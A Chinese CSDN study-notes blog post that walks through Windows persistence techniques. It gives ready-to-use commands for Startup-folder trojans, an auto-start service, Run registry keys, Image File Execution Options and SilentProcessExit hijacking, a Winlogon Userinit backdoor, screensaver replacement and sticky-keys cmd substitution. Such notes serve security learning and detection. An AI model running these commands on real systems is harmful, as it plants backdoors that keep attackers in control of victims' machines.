143-权限维持&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

最新推荐文章于 2024-11-06 18:51:51 发布
最新推荐文章于 2024-11-06 18:51:51 发布
阅读量860 收藏 30
点赞数 30
分类专栏: # 小迪安全学习笔记 文章标签: 网络安全 安全 web安全 系统安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63855540/article/details/141568109
版权

参考:FlowUs 息流 - 新一代生产力工具

参考:Windows权限维持—自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon-CSDN博客

权限维持-域环境&单机版-自启动

1、自启动路径加载

"C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

注意中间有个空格一般用引号包裹一下,另外不同的用户的用户名不同要修改一下,将木马放置在此目录下系统重新启动就会执行这里面的程序

需要重启系统

2、自启动服务加载

通过添加一个自启动的服务来执行木马

sc create ServiceTest binPath= C:\Users\Administrator\Downloads\muma.exe start=auto 创建名为ServiceTest的服务,路径 自动开启

sc delete ServiceTest

刚创建的服务是无法直接运行的,所以只能得到主机重启后执行上线,也就达到了我们权限维持的要求。

需要重启系统

3、自启动注册表加载

-当前用户键值

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

-服务器键值(需要管理员权限)

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

-添加启动项

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\Users\Administrator\Downloads\muma.exe"

也需要重启系统生效

4、计划计时任务

参考前面横向移动课程,我记得是at和schtasks命令

权限维持-域环境&单机版-映像劫持

测试:执行notepad成cmd

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"

配合GlobalFlag(系统的一个设置)隐藏:执行正常关闭后触发

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Users\Administrator\Downloads\muma.exe"

利用此命令运行notepad后将记事本关闭可就会触发后门程序。

权限维持-域环境&单机版-屏保&登录

1、WinLogon配合无文件落地上线 userinit.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\windows\system32\userinit.exe,C:\Users\Administrator\Downloads\muma.exe"

userinit.exe是一个登录之后才会运行的一个程序,所以这也是将这个程序替换为后门文件然后等待任何人切换用户登录后触发执行后门

无文件落地的上线思路其实就是使用的powershell的直接运行shellcode上线,这个不执行后门cx而是调用cs生成的powershell的shellcode去执行上线。

2、屏幕保护生效后执行后门

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\Users\Administrator\Downloads\muma.exe" /f

屏幕保护文件被替换为后门,也是挺有意思的思路,一旦屏保就触发后门的执行。

其实也是劫持的一种我认为,上面劫持的一些程序这里劫持的这个屏保程序。

权限维持-域环境&单机版-粘滞键

必须是system权限才能执行,administrator都是无法对其进行修改的。。。

粘滞键位置:

c:\windows\system32\sethc.exe

move sethc.exe sethc1.exe

copy cmd.exe sethc.exe

这个我第一入门的实验就做了这个,还是挺有意思的,主要是锁屏的情况下没有密码任然可以五下shift唤醒cmd

另外还有DLL劫持,nishang(没讲好像很老了没啥人用了),以及简单的演示了一下使用wmic横向与移动上传rustdesk但是失败了。。。

Windows权限维持的就这些启动项,注册表,劫持,计划任务,影子后门,粘滞键等等这些,算是老生常谈了,会落地实体的后门终究还是容易被发现,像什么内存马进程注入留下的后门就不容易被发现但是又容易受到系统重启的影响,各有千秋吧。

dreamer292
关注
专栏目录
可自删除 开启3389创建用户粘滞后门的vbs
09-06
### 可自删除开启3389创建用户粘滞后门的VBS脚本解析 #### 一、概述 本文将对一个特定的VBS(Visual Basic Script)脚本进行详细分析,该脚本的功能是开启3389端口,并通过创建用户和设置粘滞后门来实现远程...
粘滞后门-自动创建-批处理版(axun)
11-25
粘滞后门是一种利用操作系统中的特定功能——粘滞(Sticky Keys)来创建恶意入口的技术。粘滞Windows系统为帮助有特殊需求的用户设计的功能,当用户连续按下Shift五次时,系统会开启粘滞模式,使得...
Cute Kittens & Kitty Cats Wallpaper HD NewTab-crx插件
04-02
★活可爱的小猫&猫咪猫壁纸动画,屏保和猫主题的屏幕保护&幻灯片。 ★快速拨号,快速启动应用程序和最受欢迎的网站。 ★保持可爱的小猫&kitty猫壁纸新标签同步,结合所有freeaddons newtab - 获得更多:...
Spiderman & Iron Man Wallpaper Custom New Tab-crx插件
04-07
★活蜘蛛侠和钢铁侠壁纸动画,蜘蛛侠和铁男主题的屏幕保护程序和幻灯片。 ★快速拨号,快速启动应用程序和最受欢迎的网站。 ★保持蜘蛛侠和钢铁界面的新标签同步,结合所有FreeAddons Newtab - 获得更多蜘蛛侠和...
BTS RM & Suga Wallpapers Custom NamGi New Tab-crx插件
04-07
粘滞便笺,任务提醒。 ★Live BTS RM&Suga壁纸动画。 BTS Namgi主题的幻灯片。 ★快速启动应用程序,大多数访问过的网站。 ★Sync BTS RM&Suga壁纸新标签所有Freeaddons NewTab - 更多BTS Namgi主题:...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8534
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安全软件开发框架(SSDF) 1.1:降低软件漏洞风险的建议》解读(四)
daopuyun的博客
11-04 538
安全软件开发框架SSDF是由美国国家标准与技术研究院发布的关于安全软件开发的一组实践,帮助开发组织减少发布的软件中的漏洞数量,减少利用未检测到或未解决的漏洞的潜在影响,从根本上解决漏洞防止再次发生。以上是安全软件开发框架(SSDF)1.1版本中的软件保护部分的全部内容,后面会继续为大家整理可靠软件生产部分和漏洞响应部分,欢迎大家继续关注。(谢绝转载,更多内容可查看我的主页)
漫途焊机安全生产监管方案,提升安全生产管理水平!
mantoo2014的博客
11-01 457
随着智能制造时代的到来,企业安全生产管理的重要性日益凸显。因此,利用物联网技术和设备监控技术加强焊机安全生产监管,成为企业提升安全生产管理效率、降低安全事故率的重要手段。漫途焊机安全生产监管方案,凭借其物联网技术和设备监控技术。
【鉴权】OAuth 2.0: 高度灵活与安全的身份认证框架
人生苦短,睡觉要紧,睡醒再说
11-05 478
OAuth 2.0不仅允许第三方应用在不访问用户密码的前提下安全地访问用户在其他平台上的资源(如社交媒体账户或云存储),还通过灵活的授权模式满足了不同应用场景的需求。无论是Web应用、移动端应用还是桌面客户端,OAuth 2.0都为开发者提供了一个高效、可靠的解决方案。在本篇文章中,我们将深入分析OAuth 2.0的核心概念、授权流程、常见授权模式以及其在实际开发中的应用,帮助开发者全面理解这一授权机制的优势与实现方法。
网络安全渗透实际案例
专研计算机网络,数据通信,网络安全,系统集成
11-02 1400
该案例演示了如何通过信息收集、漏洞扫描、漏洞利用和后渗透测试等步骤,对目标系统进行完整的渗透测试。通过详细的操作步骤和修复建议,可以帮助安全人员更好地防御类似攻击。注意:渗透测试应仅限于合法授权的网络或系统。未经授权的渗透测试属于非法行为。步骤编号步骤名称操作说明代码示例1环境准备确保Kali Linux及相关工具已安装,如NmapMetasploitNetcat等。无2信息收集使用Nmap扫描目标系统,识别开放端口和服务版本。3确定服务漏洞。
【论文速读】| APILOT:通过避开过时API陷阱,引导大语言模型生成安全代码
m0_73736695的博客
11-01 1276
论文提出了一种名为APILOT的系统,它通过实时更新过时API的数据集,并结合增强生成方法,引导LLMs生成版本感知的安全代码。
RSA算法:数字安全的基石
zhaoshanshan168的博客
11-03 577
**选择公钥指数**:选择e,满足1 < e < φ(n)且gcd(e, φ(n)) = 1。- **计算私钥**:计算d,使得d * e ≡ 1 (mod φ(n))。- **大数分解**:RSA的安全性基于将模数n分解为其质因数p和q的困难性。- **计算欧拉函数**:φ(n) = (p - 1)(q - 1)。- **算法优化**:使用快速幂算法进行加密和解密,提升效率。- **数字证书**:用于身份验证,确保网站的真实性。- **计算模数**:n = p * q。
ICT网络赛道安全考点知识总结3
m0_72765822的博客
11-03 476
关于SSL VPN的特点的描述如下: 由于SSL VPN登录方式借助了浏览器,所以实现了客户端的自动安装和配置,这样用户可以随时随地用设备快捷登录,同时也缓解了网络管理员维护客户端等方面的压力。 SSL VPN针对内网资源可以解析到应用层,并精细化地发布应用。 SSL VPN可以深层次地访问内网资源并精细控制应用访问。 SSL VPN能支持各种IP应用。 SSL VPN通常可以支持多种认证方式,并且可以与现有身份认证系统集成,以提供更灵活的身份验证选项。 入侵防御特征库通常包含预定义签名,这些签名
高校实验室安全巡检系统设计与实现(源码+定制+开发)高校实验室巡检系统、实验室安全管理平台、实验室安全监控系统、智能实验室巡查系统、高校实验室风险管理
程序员阿龙的博客
11-03 1080
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Chrome与火狐的安全功能全面评估
2403_86768603的博客
11-01 1310
作为两款广受欢迎的浏览器,Chrome和火狐(Firefox)都提供了多种安全功能来保护用户的在线隐私和数据安全。Chrome通过细粒度的插件权限管理、隐身模式以及可扩展的侧边栏功能,为用户提供了灵活而全面的隐私保护方案。而火狐则凭借其强大的跟踪保护、加密与隐私保护选项以及严格的插件管理机制,赢得了众多注重隐私的用户的青睐。然而,与Chrome不同的是,火狐对插件的权限管理更加严格。同时,火狐还提供了多种隐私保护选项,如“Do Not Track”(请勿跟踪)请求头、指纹保护等,以增强用户的在线隐私。
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
安胜ANSCEN的博客
11-06 407
星盾”多源威胁检测响应平台,一款基于XDR理念的一站式安全运营平台,由长年实战对抗中形成的攻防知识经验指导设计,结合大数据、大模型与安全编排自动化响应技术,提供全局监测预警、自动化研判、智能响应、联防联控等能力,体系化提升全局态势感知和主动防御能力,规范化安全运营协同管理工作。传统威胁检测技术与单一检测技术均存在明显的局限性,为了提升网络安全防护能力,企业需要采用更加全面和多元化的威胁检测与响应策略,包括整合多种检测技术、引入智能化分析引擎、加强安全监控和预警能力等方面的工作。
您与此网站之间建立的连接不安全解决方法
安全
11-04 442
如果你打开网站,地址栏有警告,点进去是这样的提示:您与此网站之间建立的连接不安全,了解详细信息。请勿在此网站上输入任何敏感信息(例如密码或信用卡信息),因为攻击者可能会盗取这些信息。网站信息,您以前从未访问过此网站。您与网站的连接是不安全,请谨慎在该网站中输入个人信息。如图一。
提高交换网络可靠性之端口安全配置
m0_53649704的博客
11-03 401
7.laptop0 ping PC0,不通,且端口直接自动关闭了。此实验为配置交换机端口安全,当非法设备接入接口时自动触发安全措施。6,添加一台PC机,按照图中要求配置ip地址。2.交换机改名为S1,同时启用端口安全。4.设置违规处理方式:即违规则关闭端口。1.查看PC1和PC2的MAC地址👇。5.查看安全端口相关信息。3.配置允许接入设备。
漏洞与攻击技术详解
最新发布
QQ_778132974的博客
11-06 342
一、漏洞的定义与分类漏洞是指在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,这些缺陷使得攻击者能够在未授权的情况下访问或破坏系统。漏洞可以按照不同的标准进行分类,如:按照类型分类:缓冲区溢出漏洞:由于程序在处理输入时没有进行足够的边界检查,导致输入的数据超出了缓冲区的大小,从而覆盖了相邻的内存区域,造成程序崩溃或执行恶意代码。提权漏洞:攻击者利用系统中的某些缺陷,提升自己的权限,从而能够执行更高权限的操作。随着攻击技术的不断进步,攻击者能够利用更多的漏洞来执行攻击,从而给网络安全带来更大的威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值